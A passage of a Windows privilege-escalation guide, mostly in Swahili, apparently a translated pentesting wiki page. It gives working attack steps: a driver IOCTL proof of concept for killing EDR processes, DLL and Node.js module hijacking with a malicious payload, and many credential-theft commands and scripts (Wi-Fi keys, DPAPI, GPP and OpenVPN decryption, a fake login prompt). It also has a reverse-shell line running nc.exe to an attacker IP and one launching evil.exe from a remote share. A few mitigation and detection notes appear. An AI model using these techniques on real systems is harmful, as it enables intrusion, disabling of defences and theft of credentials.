Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Notepad++ plugin autoload persistence/execution

Notepad++ hu-oload kiotomati DLL yoyote ya plugin iliyo chini ya subfolders zake za plugins. Ikiwa kuna portable/copy install inayoweza kuandikwa, kuweka plugin hasidi husababisha automatic code execution ndani ya notepad++.exe kwenye kila launch (ikiwemo kutoka DllMain na plugin callbacks).

Notepad Plus Plus Plugin Autoload Persistence

Run at startup

Angalia kama unaweza ku-overwrite registry au binary fulani ambayo ita-execute na user tofauti.
Soma ukurasa ufuatao ili kujifunza zaidi kuhusu interesting autoruns locations to escalate privileges:

Privilege Escalation with Autoruns

Drivers

Tafuta third party weird/vulnerable drivers zinazowezekana

driverquery
driverquery.exe /fo table
driverquery /SI

Ikiwa driver ina expose arbitrary kernel read/write primitive (kawaida katika IOCTL handlers zilizoundwa vibaya), unaweza kufanya escalation kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Tazama technique ya hatua kwa hatua hapa:

Arbitrary Kernel Rw Token Theft

Kwa race-condition bugs ambapo vulnerable call hufungua attacker-controlled Object Manager path, kupunguza kasi ya lookup kimakusudi (kwa kutumia max-length components au deep directory chains) kunaweza kupanua dirisha kutoka microseconds hadi tens of microseconds:

Kernel Race Condition Object Manager Slowdown

Registry hive memory corruption primitives

Modern hive vulnerabilities hukuruhusu groom deterministic layouts, kutumia writable HKLM/HKU descendants vibaya, na kubadilisha metadata corruption kuwa kernel paged-pool overflows bila custom driver. Jifunze chain kamili hapa:

Windows Registry Hive Exploitation

Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)

Baadhi ya signed third‑party drivers huunda device object yao kwa strong SDDL kupitia IoCreateDeviceSecure lakini husahau kuweka FILE_DEVICE_SECURE_OPEN katika DeviceCharacteristics. Bila flag hii, secure DACL haitatekelezwa wakati device inafunguliwa kupitia path iliyo na extra component, hivyo kumruhusu mtumiaji yeyote bila privileges kupata handle kwa kutumia namespace path kama:

• \ .\DeviceName\anything
• \ .\amsdk\anyfile (kutoka kwenye real-world case)

Mara tu mtumiaji anapoweza kufungua device, privileged IOCTLs zinazotolewa na driver zinaweza kutumiwa vibaya kwa LPE na tampering. Capabilities za mfano zilizoonekana in the wild:

• Kurudisha full-access handles kwa arbitrary processes (token theft / SYSTEM shell kupitia DuplicateTokenEx/CreateProcessAsUser).
• Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
• Kuua arbitrary processes, ikijumuisha Protected Process/Light (PP/PPL), ikiruhusu AV/EDR kill kutoka user land kupitia kernel.

Minimal PoC pattern (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Mitigations for developers

• Daima weka FILE_DEVICE_SECURE_OPEN unapounda device objects zinazokusudiwa kuzuiwa na DACL.
• Thibitisha caller context kwa shughuli za privileged. Ongeza ukaguzi wa PP/PPL kabla ya kuruhusu process termination au handle returns.
• Zuia IOCTLs (access masks, METHOD_*, input validation) na fikiria kutumia brokered models badala ya direct kernel privileges.

Detection ideas for defenders

• Fuatilia user-mode opens za majina ya device ya kushukiwa (mf., \ .\amsdk*) na mfuatano mahususi wa IOCTL unaoashiria abuse.
• Tekeleza Microsoft’s vulnerable driver blocklist (HVCI/WDAC/Smart App Control) na dumisha orodha zako za allow/deny.

PATH DLL Hijacking

If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.

Angalia permissions za folders zote ndani ya PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu:

Writable Sys Path +Dll Hijacking Privesc

Node.js / Electron module resolution hijacking via C:\node_modules

Hii ni lahaja ya Windows uncontrolled search path inayowaathiri programu za Node.js na Electron wanapofanya import tupu kama require("foo") na module inayotarajiwa haipo.

Node hutatua packages kwa kupanda juu kwenye mti wa saraka na kuangalia folda za node_modules katika kila parent. Kwenye Windows, safari hiyo inaweza kufika hadi root ya drive, kwa hivyo programu iliyozinduliwa kutoka C:\Users\Administrator\project\app.js inaweza kuishia kuchunguza:

1. C:\Users\Administrator\project\node_modules\foo
2. C:\Users\Administrator\node_modules\foo
3. C:\Users\node_modules\foo
4. C:\node_modules\foo

Ikiwa mtumiaji mwenye low-privileged anaweza kuunda C:\node_modules, anaweza kuweka foo.js hasidi (au package folder) na kusubiri mchakato wa Node/Electron wenye higher-privileged utatue dependency inayokosekana. Payload hutekelezwa katika security context ya mchakato wa mwathiriwa, hivyo hii inakuwa LPE wakati wowote lengo linaendeshwa kama administrator, kutoka kwa elevated scheduled task/service wrapper, au kutoka kwa auto-started privileged desktop app.

Hii ni ya kawaida hasa wakati:

• dependency imetangazwa kwenye optionalDependencies
• library ya watu wengine inafunika require("foo") kwa try/catch na kuendelea hata ikishindikana
• package imeondolewa kwenye production builds, imeachwa wakati wa packaging, au imeshindwa kusakinishwa
• vulnerable require() iko ndani sana kwenye dependency tree badala ya kuwa kwenye main application code

Kuwinda targets zenye udhaifu

Tumia Procmon kuthibitisha resolution path:

• Chuja kwa Process Name = target executable (node.exe, EXE ya Electron app, au wrapper process)
• Chuja kwa Path contains node_modules
• Zingatia NAME NOT FOUND na open ya mwisho iliyofanikiwa chini ya C:\node_modules

Useful code-review patterns in unpacked .asar files or application sources:

rg -n 'require\\("[^./]' .
rg -n "require\\('[^./]" .
rg -n 'optionalDependencies' .
rg -n 'try[[:space:]]*\\{[[:space:][:print:]]*require\\(' .

Utekelezaji wa mashambulizi

1. Tambua jina la kifurushi lililokosekana kutoka Procmon au ukaguzi wa chanzo.
2. Tengeneza root lookup directory ikiwa bado haipo:

mkdir C:\node_modules

3. Ondoa module yenye jina halisi linalotarajiwa:

// C:\node_modules\foo.js
require("child_process").exec("calc.exe")
module.exports = {}

4. Anzisha application ya mwathirika. Ikiwa application inajaribu require("foo") na module halali haipo, Node inaweza kupakia C:\node_modules\foo.js.

Mifano halisi ya modules optional zinazokosekana zinazolingana na pattern hii ni pamoja na bluebird na utf-8-validate, lakini technique ni sehemu inayoweza kutumiwa tena: tafuta missing bare import yoyote ambayo privileged Windows Node/Electron process itaresolve.

Detection and hardening ideas

• Toa alert wakati user anapounda C:\node_modules au anaandika new .js files/packages humo.
• Tafuta high-integrity processes zinazosomea kutoka C:\node_modules\*.
• Pakia all runtime dependencies ndani ya production na fanya audit ya matumizi ya optionalDependencies.
• Kagua third-party code kwa silent try { require("...") } catch {} patterns.
• Disable optional probes wakati library inasaidia hivyo (kwa mfano, baadhi ya ws deployments zinaweza kuepuka legacy utf-8-validate probe kwa WS_NO_UTF_8_VALIDATE=1).

Network

Shares

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Angalia kompyuta nyingine zinazojulikana zilizoandikwa moja kwa moja kwenye hosts file

type C:\Windows\System32\drivers\etc\hosts

Miingiliano ya Mtandao & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Milango Wazi

Angalia restricted services kutoka nje

netstat -ano #Opened ports?

Jedwali la Uelekezaji

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Sheria za Firewall

Angalia ukurasa huu kwa amri zinazohusiana na Firewall (orodhesha sheria, tengeneza sheria, zima, zima…)

Zaidi amri za uorodheshaji wa mtandao hapa

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Binary bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Ukipata root user unaweza kusikiliza kwenye port yoyote (mara ya kwanza utakapokuwa unatumia nc.exe kusikiliza kwenye port itakuuliza kupitia GUI kama nc inapaswa kuruhusiwa na firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Ili kuanza bash kama root kwa urahisi, unaweza kujaribu --default-user root

Unaweza kuchunguza mfumo wa faili wa WSL kwenye folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows Credentials

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

Kutoka https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows Vault huhifadhi credentials za mtumiaji kwa servers, websites na programu nyingine ambazo Windows inaweza log in the users automatically. Mwanzoni, hii inaweza kuonekana kama sasa watumiaji wanaweza kuhifadhi credentials zao za Facebook, credentials za Twitter, credentials za Gmail n.k., ili ziweze kuingia moja kwa moja kupitia browsers. Lakini sivyo ilivyo.

Windows Vault huhifadhi credentials ambazo Windows inaweza log in the users automatically, ambayo inamaanisha kuwa programu yoyote ya Windows application that needs credentials to access a resource (server au website) inaweza kutumia hii Credential Manager & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuingiza username na password kila wakati.

Isipokuwa applications ziingiliane na Credential Manager, sidhani kama inawezekana kwao kutumia credentials kwa resource fulani. Kwa hiyo, ikiwa application yako inataka kutumia vault, inapaswa kwa namna fulani kucommunicate with the credential manager and request the credentials for that resource kutoka kwenye default storage vault.

Tumia cmdkey kuorodhesha credentials zilizohifadhiwa kwenye machine.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Kisha unaweza kutumia runas na chaguo la /savecred ili kutumia credentials zilizohifadhiwa. Mfano ufuatao unaita binary ya mbali kupitia SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Kutumia runas na seti ya vitambulisho vilivyotolewa.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Note kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka Empire Powershells module.

DPAPI

Data Protection API (DPAPI) hutoa njia ya usimbaji fiche wa data kwa symmetric, na hutumika hasa ndani ya mfumo wa uendeshaji wa Windows kwa usimbaji fiche wa symmetric wa asymmetric private keys. Usimbaji huu hutumia siri ya user au system ili kuongeza entropy kwa kiasi kikubwa.

DPAPI huwezesha usimbaji fiche wa keys kupitia symmetric key inayotokana na login secrets za user. Katika hali zinazohusisha system encryption, hutumia domain authentication secrets za system.

Encrypted user RSA keys, kwa kutumia DPAPI, huhifadhiwa kwenye saraka ya %APPDATA%\Microsoft\Protect\{SID}, ambapo {SID} inawakilisha Security Identifier ya user. DPAPI key, iliyowekwa pamoja na master key inayolinda private keys za user kwenye faili moja, kwa kawaida huwa na bytes 64 za random data. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umezuiwa, hivyo kuzuia kuorodhesha maudhui yake kupitia amri ya dir katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell).

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Unaweza kutumia mimikatz module dpapi::masterkey pamoja na hoja zinazofaa (/pvk au /rpc) ili kuidecrypt.

credentials files protected by the master password kwa kawaida zipo katika:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unaweza kutumia mimikatz module dpapi::cred na /masterkey inayofaa ili kusimbua.
Unaweza kutoa DPAPI nyingi masterkeys kutoka memory kwa kutumia module sekurlsa::dpapi (ikiwa wewe ni root).

DPAPI - Extracting Passwords

PowerShell Credentials

PowerShell credentials mara nyingi hutumiwa kwa scripting na kazi za automation kama njia ya kuhifadhi credentials zilizosimbwa kwa urahisi. Credentials hizi zinalindwa kwa kutumia DPAPI, ambayo kwa kawaida humaanisha zinaweza kusimbuliwa tu na user yuleyule kwenye computer ileile zilipotengenezwa.

Ili kufichua PS credentials kutoka kwenye file lenye hiyo unaweza kufanya:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Miunganisho ya RDP Iliyohifadhiwa

Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\

Amri Zilizotekelezwa Hivi Karibuni

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Remote Desktop Credential Manager

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module

Sticky Notes

People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.

AppCmd.exe

Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.

This code was extracted from PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Angalia kama C:\Windows\CCM\SCClient.exe ipo .
Vifungashio huendeshwa kwa SYSTEM privileges, vingine vingi vina hatari ya DLL Sideloading (Info from https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Faili na Registry (Vitambulisho)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Host Keys

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys in registry

SSH private keys zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys kwa hivyo unapaswa kuangalia ikiwa kuna chochote cha kuvutia humo:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

Ikiwa utapata ingizo lolote ndani ya njia hiyo huenda ni ufunguo wa SSH uliohifadhiwa. Unahifadhiwa kwa njia iliyosimbwa lakini unaweza kusimbuliwa kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Taarifa zaidi kuhusu mbinu hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

Ikiwa huduma ya ssh-agent haijaendeshwa na unataka ianze kiotomatiki wakati wa boot endesha:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

Inaonekana mbinu hii si halali tena. Nilijaribu kuunda baadhi ya funguo za ssh, kuziongeza kwa ssh-add na kuingia kupitia ssh kwenye mashine. Registry HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya dpapi.dll wakati wa uthibitishaji wa asymmetric key.

Unattended files

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Unaweza pia kutafuta faili hizi kwa kutumia metasploit: post/windows/gather/enum_unattend

Mfano wa maudhui:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

SAM & SYSTEM backups

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Cloud Credentials

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Tafuta faili linaloitwa SiteList.xml

Cached GPP Pasword

Kipengele kilikuwa kinapatikana awali ambacho kiliruhusu kupelekwa kwa custom local administrator accounts kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na dosari kubwa za usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML ndani ya SYSVOL, zingeweza kufikiwa na any domain user. Pili, passwords ndani ya GPP hizi, zilizosimbwa kwa AES256 kwa kutumia publicly documented default key, zingeweza kufunguliwa na any authenticated user. Hii iliweka hatari kubwa, kwa kuwa ingeweza kuruhusu users kupata elevated privileges.

Ili kupunguza hatari hii, function ilitengenezwa ya kuchanganua locally cached GPP files zenye field ya “cpassword” ambayo si tupu. Baada ya kupata faili kama hilo, function hufungua password na kurudisha custom PowerShell object. Object hii inajumuisha details kuhusu GPP na location ya faili, ikisaidia katika utambuzi na remediation ya security vulnerability hii.

Tafuta ndani ya C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (kabla ya W Vista) kwa faili hizi:

• Groups.xml
• Services.xml
• Scheduledtasks.xml
• DataSources.xml
• Printers.xml
• Drives.xml

Ili kufungua cPassword:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Kutumia crackmapexec kupata manenosiri:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Web Config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\Windows\Microsoft.NET\Framework644.0.30319\Config\web.config | findstr connectionString
C:\inetpub\wwwroot\web.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Mfano wa web.config wenye credentials:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

OpenVPN credentials

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Kumbukumbu

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Uliza kwa ajili ya credentials

Unaweza daima kumwomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unafikiri anaweza kuzijua (tambua kwamba kuuliza mteja moja kwa moja kwa credentials ni jambo hatari sana):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Majina ya faili yanayoweza kuwa na credentials

Faili zinazojulikana ambazo wakati fulani uliopita zilikuwa na passwords kwa clear-text au Base64

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

Tafuta faili zote zilizopendekezwa:

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Vitambulisho ndani ya RecycleBin

Unapaswa pia kuangalia Bin ili kutafuta vitambulisho vilivyo ndani yake

Ili kurejesha passwords zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html

Ndani ya registry

Viingilio vingine vinavyowezekana vya registry vyenye vitambulisho

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

Browsers History

Unapaswa kuangalia dbs ambapo passwords kutoka Chrome or Firefox zimehifadhiwa.
Pia angalia history, bookmarks na favourites za browsers ili labda baadhi ya passwords are zimehifadhiwa hapo.

Tools za kutoa passwords kutoka browsers:

• Mimikatz: dpapi::chrome
• SharpWeb
• SharpChromium
• SharpDPAPI

COM DLL Overwriting

Component Object Model (COM) ni teknolojia iliyojengwa ndani ya Windows operating system inayoruhusu intercommunication kati ya software components za lugha tofauti. Kila COM component identified via a class ID (CLSID) na kila component hufichua functionality kupitia one or more interfaces, identified via interface IDs (IIDs).

